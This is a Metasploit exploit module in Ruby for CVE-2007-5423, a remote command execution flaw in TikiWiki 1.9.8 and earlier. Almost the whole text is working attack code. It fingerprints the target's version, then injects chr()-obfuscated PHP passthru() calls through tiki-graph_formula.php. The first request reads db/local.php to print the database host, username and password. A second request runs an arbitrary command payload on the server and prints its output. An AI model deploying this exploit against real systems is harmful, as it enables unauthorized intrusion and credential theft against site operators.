TikiWiki tiki-graph_formula Remote Command Execution

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'TikiWiki tiki-graph_formula Remote Command Execution',  
'Description' => %q{  
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary commands.   
The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input   
supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP   
commands resulting in a loss of integrity.  
},  
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
['CVE', '2007-5423'],  
['OSVDB', '40478'],  
['BID', '26006'],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 1024,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl ruby bash telnet',  
}  
},   
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Targets' => [[ 'Automatic', { }]],  
'DisclosureDate' => 'Oct 10 2007',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),  
], self.class)  
end  
  
def check  
res = send_request_raw({  
'uri' => datastore['URI'] + "/tiki-index.php",  
'method' => 'GET',  
'headers' =>  
{  
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',  
'Connection' => 'Close',  
}  
}, 25)  
  
if (res and res.message == "OK" and res.body.match(/TikiWiki v1.|TikiWiki 1./))  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
  
url_db_local = datastore['URI'] +   
"/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +   
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." +  
"chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112)." +  
"chr(59)." + "chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" +  
").die()&t=png&title="  
  
print_status("Sending request...")  
  
res = send_request_raw({  
'uri' => url_db_local,  
'method' => 'GET',  
'headers' =>  
{  
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',  
'Connection' => 'Close',  
}  
}, 25)  
  
if (res and res.message == "OK" and res.body)  
print_status("The server returned : #{res.code} #{res.message}")  
print_status("Server version : #{res.headers['Server']}")  
  
db_tiki = res.body.match(/db_tiki='(.*?)';/m)  
dbversion = res.body.match(/dbversion_tiki='(.*?)';/m)  
host_tiki = res.body.match(/host_tiki='(.*?)';/m)  
user_tiki = res.body.match(/user_tiki='(.*?)';/m)  
pass_tiki = res.body.match(/pass_tiki='(.*?)';/m)  
dbs_tiki = res.body.match(/dbs_tiki='(.*?)';/m)  
  
print_status("TikiWiki database informations : \n")  
  
print("db_tiki : " + db_tiki[1] + "\n")  
print("dbversion : " + dbversion[1] + "\n")  
print("host_tiki : " + host_tiki[1] + "\n")  
print("user_tiki : " + user_tiki[1] + "\n")  
print("pass_tiki : " + pass_tiki[1] + "\n")  
print("dbs_tiki : " + dbs_tiki[1] + "\n\n")  
else  
print_status("No response from the server")  
end  
  
command = Rex::Text.uri_encode(payload.encoded)  
encoded = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"  
  
url_cmd = datastore['URI'] + "/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +  
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." + encoded + ".chr(59)." +   
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" + ").die()&t=png&title="  
  
print_status("Sending request...")  
  
res = send_request_raw({  
'uri' => url_cmd,  
'method' => 'GET',  
'headers' =>  
{  
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',  
'Connection' => 'Close',  
}  
}, 25)  
  
if (res and res.message == "OK" and res.body)  
  
print_status("The server returned : #{res.code} #{res.message}")  
cmd_output = res.body.match(/YYY\n(.*)\nYYY/m)  
  
if (cmd_output)  
print_status("Command output from the server :")  
print("\n" + cmd_output[1] + "\n\n")  
else  
print_status("This server may not be vulnerable")  
end  
  
else  
print_status("No response from the server")  
end  
end  
  
end  
  
`